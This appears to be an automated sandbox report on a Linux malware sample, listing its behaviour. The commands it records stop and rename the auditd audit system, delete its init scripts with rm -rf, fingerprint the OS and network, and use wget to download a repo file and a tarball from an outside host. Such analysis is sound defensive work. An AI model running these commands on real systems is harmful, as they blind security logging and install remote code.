Technical Information
Malicious functions:
Performs process tracing:
- <SAMPLE>
- <SAMPLE_FULL_PATH>
Manages services:
- /sbin/service auditd stop
- /sbin/service wsosstatd stop
Launches processes:
- /bin/bash <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' \"$@\" <SAMPLE_FULL_PATH>
- <SAMPLE_FULL_PATH>
- /bin/bash <SAMPLE_FULL_PATH> -c
- cat /etc/issue
- head -n 1
- grep -iE Red.*release 4|CentOS.*4\.
- grep -iE Red.*release 4|CentOS.*4\. /etc/redhat-release
- grep -iE Red.*release 5|CentOS.*5\.
- grep -iE Red.*release 5|CentOS.*5\. /etc/redhat-release
- grep -iE Red.*release 6|CentOS.*6\.
- grep -iE Red.*release 6|CentOS.*6\. /etc/redhat-release
- /sbin/ifconfig -a
- grep inet
- grep -v 127.0.0.1
- grep -v inet6
- grep -v ^169.254
- tr -d addr:
- wc -l
- sed s/\([0-9]\+\.[0-9]\+\.[0-9]\+\)\.[0-9]\+/\1/g
- awk {print $2}
- sleep 5
- wget -e -http-proxy= -t 2 -T 50 http://wsautoinstall1.lxdns.com/ws.repo -O /etc/yum.repos.d/ws.repo
- grep already
- mkdir -p /var/lib/local/etc/WsCdnOsStatLog/LogSummary/wsosstad/.wsosstat/
- mv /etc/audisp/audispd.conf /etc/audisp/wsosstatdispd.conf
- mv /etc/audit/audit.rules /etc/audit/wsosstat.acl
- mv /etc/audit/auditd.conf /etc/audit/wsosstatd.conf
- mv /etc/rc.d/init.d/auditd /etc/rc.d/init.d/wsosstatd
- mv /etc/sysconfig/auditd /etc/sysconfig/wsosstatd
- mv /etc/audisp /etc/wsosstatdisp
- mv /etc/audit /etc/wsosstat
- mv /sbin/audispd /sbin/wsosstatdispd
- mv /sbin/auditctl /sbin/wsosstatctl
- mv /sbin/auditd /sbin/wsosstatd
- mv /sbin/aureport /sbin/wsosstatreport
- mv /sbin/ausearch /sbin/wsosstatsearch
- mv /sbin/autrace /sbin/wsosstattrace
- mv /usr/bin/aulastlog /usr/bin/wsosstatlastlog
- mv /usr/bin/ausyscall /usr/bin/wsosstatsyscall
- /sbin/chkconfig --add wsosstatd
- xargs -i rm -rf {}
- find /etc/rc.d -name *auditd*
- wget -e -http-proxy= -t 2 -T 50 http://wsautoinstall1.lxdns.com/tools/wsosstat.tar.gz -O /tmp/wsosstat.tar.gz
Kills the following processes:
- <SAMPLE>
- <SAMPLE_FULL_PATH>
Performs operations with the file system:
Creates folders:
- /var/lib/local
- /var/lib/local/etc
- /var/lib/local/etc/WsCdnOsStatLog
- /var/lib/local/etc/WsCdnOsStatLog/LogSummary
- /var/lib/local/etc/WsCdnOsStatLog/LogSummary/wsosstad
- /var/lib/local/etc/WsCdnOsStatLog/LogSummary/wsosstad/.wsosstat
Creates or modifies files:
- /etc/yum.repos.d/ws.repo
- /tmp/wsosstat.tar.gz
Network activity:
Establishes connection:
- <LOCAL_DNS_SERVER>
HTTP GET requests:
- ws###########1.lxdns.com/tools/wsosstat.tar.gz
DNS ASK:
- ws######stall1.lxdns.com
Other:
Collects OS information
Collects RAM information